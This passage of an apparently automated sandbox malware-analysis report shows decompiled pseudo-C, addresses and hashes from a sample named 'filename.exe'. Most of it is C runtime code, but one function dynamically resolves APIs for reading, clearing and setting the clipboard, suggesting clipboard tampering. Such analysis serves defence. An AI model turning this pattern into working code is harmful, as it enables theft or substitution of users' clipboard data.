											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                          0x00405d00
                                                                                                                                                                                          0x00405d01
                                                                                                                                                                                          0x00405d07
                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                          0x00405e7f
                                                                                                                                                                                          0x00405e83
                                                                                                                                                                                          0x00405d0d
                                                                                                                                                                                          0x00405d0d
                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d1a
                                                                                                                                                                                          0x00405d1a
                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d2f
                                                                                                                                                                                          0x00405d34
                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                          0x00405dad
                                                                                                                                                                                          0x00405db0
                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                          0x00405db2
                                                                                                                                                                                          0x00405db5
                                                                                                                                                                                          0x00405db7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405dbd
                                                                                                                                                                                          0x00405dbd
                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                          0x00405df8
                                                                                                                                                                                          0x00405dfb
                                                                                                                                                                                          0x00405dfd
                                                                                                                                                                                          0x00405e04
                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                          0x00405e0c
                                                                                                                                                                                          0x00405e0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                          0x00405e73
                                                                                                                                                                                          0x00405e78
                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e32
                                                                                                                                                                                          0x00405e34
                                                                                                                                                                                          0x00405e37
                                                                                                                                                                                          0x00405e38
                                                                                                                                                                                          0x00405e3c
                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                          0x00405e4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e55
                                                                                                                                                                                          0x00405e57
                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                          0x00405e61
                                                                                                                                                                                          0x00405e66
                                                                                                                                                                                          0x00405e69
                                                                                                                                                                                          0x00405e6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e6d
                                                                                                                                                                                          0x00405e6f
                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e1a
                                                                                                                                                                                          0x00405e1f
                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                          0x00405e27
                                                                                                                                                                                          0x00405e2a
                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                          0x00405dc3
                                                                                                                                                                                          0x00405dc9
                                                                                                                                                                                          0x00405dcb
                                                                                                                                                                                          0x00405dcc
                                                                                                                                                                                          0x00405dcd
                                                                                                                                                                                          0x00405dd4
                                                                                                                                                                                          0x00405ddb
                                                                                                                                                                                          0x00405ddd
                                                                                                                                                                                          0x00405de5
                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                          0x00405df0
                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                          0x00405d3a
                                                                                                                                                                                          0x00405d3c
                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                          0x00405e79
                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                          0x00405e7e
                                                                                                                                                                                          0x00405d49
                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                          0x00405d77
                                                                                                                                                                                          0x00405d79
                                                                                                                                                                                          0x00405da7
                                                                                                                                                                                          0x00405dac
                                                                                                                                                                                          0x00405d7b
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d87
                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                          0x00405d91
                                                                                                                                                                                          0x00405d96
                                                                                                                                                                                          0x00405d9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405da1
                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d4f
                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                          0x00405d6f
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _fseek_malloc_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 208892515-0
                                                                                                                                                                                          • Opcode ID: 67ac19b9a0d70d7af40f5452e8cb91eb92d584cf98b69a29d9abb47510c8f44e
                                                                                                                                                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                          • Opcode Fuzzy Hash: 67ac19b9a0d70d7af40f5452e8cb91eb92d584cf98b69a29d9abb47510c8f44e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                                                          0x0040baaa
                                                                                                                                                                                          0x0040baba
                                                                                                                                                                                          0x0040bae0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bac1
                                                                                                                                                                                          0x0040bac1
                                                                                                                                                                                          0x0040bac4
                                                                                                                                                                                          0x0040bac6
                                                                                                                                                                                          0x0040bae7
                                                                                                                                                                                          0x0040baea
                                                                                                                                                                                          0x0040baec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040baee
                                                                                                                                                                                          0x0040baf3
                                                                                                                                                                                          0x0040baf6
                                                                                                                                                                                          0x0040baf9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bafe
                                                                                                                                                                                          0x0040bb02
                                                                                                                                                                                          0x0040bb09
                                                                                                                                                                                          0x0040bb0c
                                                                                                                                                                                          0x0040bb0f
                                                                                                                                                                                          0x0040bb11
                                                                                                                                                                                          0x0040bb1b
                                                                                                                                                                                          0x0040bb13
                                                                                                                                                                                          0x0040bb16
                                                                                                                                                                                          0x0040bb16
                                                                                                                                                                                          0x0040bb22
                                                                                                                                                                                          0x0040bb24
                                                                                                                                                                                          0x0040bbe9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                          0x0040bb2d
                                                                                                                                                                                          0x0040bb2d
                                                                                                                                                                                          0x0040bb33
                                                                                                                                                                                          0x0040bb64
                                                                                                                                                                                          0x0040bb64
                                                                                                                                                                                          0x0040bb67
                                                                                                                                                                                          0x0040bbc0
                                                                                                                                                                                          0x0040bbc7
                                                                                                                                                                                          0x0040bbca
                                                                                                                                                                                          0x0040bbf5
                                                                                                                                                                                          0x0040bbf5
                                                                                                                                                                                          0x0040bbf7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbfb
                                                                                                                                                                                          0x0040bbcc
                                                                                                                                                                                          0x0040bbcf
                                                                                                                                                                                          0x0040bbd2
                                                                                                                                                                                          0x0040bbd3
                                                                                                                                                                                          0x0040bbd6
                                                                                                                                                                                          0x0040bbd8
                                                                                                                                                                                          0x0040bbda
                                                                                                                                                                                          0x0040bbda
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbd8
                                                                                                                                                                                          0x0040bb69
                                                                                                                                                                                          0x0040bb6b
                                                                                                                                                                                          0x0040bb78
                                                                                                                                                                                          0x0040bb78
                                                                                                                                                                                          0x0040bb7c
                                                                                                                                                                                          0x0040bb7e
                                                                                                                                                                                          0x0040bb82
                                                                                                                                                                                          0x0040bb84
                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                          0x0040bb87
                                                                                                                                                                                          0x0040bb89
                                                                                                                                                                                          0x0040bb8a
                                                                                                                                                                                          0x0040bb94
                                                                                                                                                                                          0x0040bb95
                                                                                                                                                                                          0x0040bb9a
                                                                                                                                                                                          0x0040bb9d
                                                                                                                                                                                          0x0040bba0
                                                                                                                                                                                          0x0040bc03
                                                                                                                                                                                          0x0040bc03
                                                                                                                                                                                          0x0040bc07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bba2
                                                                                                                                                                                          0x0040bba2
                                                                                                                                                                                          0x0040bba4
                                                                                                                                                                                          0x0040bba6
                                                                                                                                                                                          0x0040bba8
                                                                                                                                                                                          0x0040bba8
                                                                                                                                                                                          0x0040bbaa
                                                                                                                                                                                          0x0040bbad
                                                                                                                                                                                          0x0040bbaf
                                                                                                                                                                                          0x0040bbb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbb3
                                                                                                                                                                                          0x0040bbb1
                                                                                                                                                                                          0x0040bba0
                                                                                                                                                                                          0x0040bb6e
                                                                                                                                                                                          0x0040bb74
                                                                                                                                                                                          0x0040bb76
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bb76
                                                                                                                                                                                          0x0040bb35
                                                                                                                                                                                          0x0040bb38
                                                                                                                                                                                          0x0040bb3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bb3c
                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                          0x0040bb42
                                                                                                                                                                                          0x0040bb44
                                                                                                                                                                                          0x0040bb46
                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                          0x0040bb50
                                                                                                                                                                                          0x0040bb55
                                                                                                                                                                                          0x0040bb58
                                                                                                                                                                                          0x0040bb5a
                                                                                                                                                                                          0x0040bb5d
                                                                                                                                                                                          0x0040bb5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                          0x0040bb24
                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                          0x0040bacd
                                                                                                                                                                                          0x0040bace
                                                                                                                                                                                          0x0040bacf
                                                                                                                                                                                          0x0040bad0
                                                                                                                                                                                          0x0040bad1
                                                                                                                                                                                          0x0040bad2
                                                                                                                                                                                          0x0040bad8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040badd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                          • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Analysis Process: filename.exe PID: 5416 Parent PID: 6504 filename.exeCOMMON

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00401000, Relevance: 131.4, APIs: 37, Strings: 38, Instructions: 159libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00401000() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t49;
				void* _t50;
				struct HINSTANCE__* _t52;
				void* _t54;
				struct HINSTANCE__* _t56;
				void* _t58;
				struct HINSTANCE__* _t60;
				struct HINSTANCE__* _t61;
				struct HINSTANCE__* _t62;

				_t11 = LoadLibraryW(L"kernel32.dll");
				_v8 = _t11;
				if(_t11 != 0) {
					_t12 = GetProcAddress(_t11, "LoadLibraryW");
					 *0x40400c = _t12;
					_v12 =  *_t12(L"Shlwapi.dll", _t54, _t58, _t50);
					_v20 = LoadLibraryW(L"ntdll.dll");
					_t15 = LoadLibraryW(L"Shell32.dll");
					_t16 = LoadLibraryW(L"Ole32.dll"); // executed
					_v16 = LoadLibraryW(L"User32.dll");
					LoadLibraryW(L"Ole32.dll");
					_t19 = GetProcAddress(_v8, "GetProcAddress");
					_t60 = _v8;
					 *0x404038 = _t19;
					 *0x40401c =  *_t19(_t60, "GetModuleFileNameW");
					 *0x404044 = GetProcAddress(_t60, "CreateDirectoryW");
					 *0x404024 = GetProcAddress(_t60, "GlobalAlloc");
					 *0x40403c = GetProcAddress(_t60, "GlobalFree");
					 *0x404000 = GetProcAddress(_t60, "GlobalLock");
					 *0x404034 = GetProcAddress(_t60, "GlobalUnlock");
					 *0x404010 = GetProcAddress(_t60, "LocalAlloc");
					 *0x404030 = GetProcAddress(_t60, "LocalFree");
					_t28 = GetProcAddress(_t60, "lstrlenW");
					_t61 = _v12;
					 *0x404020 = _t28;
					 *0x404018 = GetProcAddress(_t61, "StrChrW");
					 *0x404054 = GetProcAddress(_t61, "StrStrW");
					GetProcAddress(_t61, "StrStrIW");
					GetProcAddress(_t61, "StrToIntExW");
					 *0x404058 = GetProcAddress(_t61, "PathIsDirectoryW");
					GetProcAddress(_t16, "CoInitialize");
					_t56 = _v8;
					GetProcAddress(_t56, "HeapFree");
					GetProcAddress(_t56, "CreateMutexA");
					 *0x404040 = GetProcAddress(_t56, "CreateMutexW");
					 *0x40402c = GetProcAddress(_t56, "GetLastError");
					GetProcAddress(_t15, "SHGetFolderPathA");
					_t40 = GetProcAddress(_t61, "PathAppendW");
					_t62 = _v16;
					 *0x404014 = _t40;
					GetProcAddress(_t62, "StringCbPrintfW");
					_t52 = _v20;
					 *0x404028 = GetProcAddress(_t52, "memset");
					GetProcAddress(_t52, "wmemset");
					 *0x404004 = GetProcAddress(_t52, "memcpy");
					 *0x404048 = GetProcAddress(_t62, "OpenClipboard");
					 *0x40405c = GetProcAddress(_t62, "GetClipboardData");
					 *0x404008 = GetProcAddress(_t62, "EmptyClipboard");
					 *0x404050 = GetProcAddress(_t62, "SetClipboardData");
					_t49 = GetProcAddress(_t62, "CloseClipboard");
					 *0x40404c = _t49;
					return _t49;
				}
				return _t11;
			}























                                                                                                                                                                                          0x0040100b
                                                                                                                                                                                          0x00401011
                                                                                                                                                                                          0x00401016
                                                                                                                                                                                          0x0040102b
                                                                                                                                                                                          0x00401032
                                                                                                                                                                                          0x0040103e
                                                                                                                                                                                          0x0040104c
                                                                                                                                                                                          0x0040104f
                                                                                                                                                                                          0x0040105c
                                                                                                                                                                                          0x00401074
                                                                                                                                                                                          0x00401077
                                                                                                                                                                                          0x00401085
                                                                                                                                                                                          0x00401087
                                                                                                                                                                                          0x00401090
                                                                                                                                                                                          0x0040109d
                                                                                                                                                                                          0x004010ae
                                                                                                                                                                                          0x004010bf
                                                                                                                                                                                          0x004010d0
                                                                                                                                                                                          0x004010e1
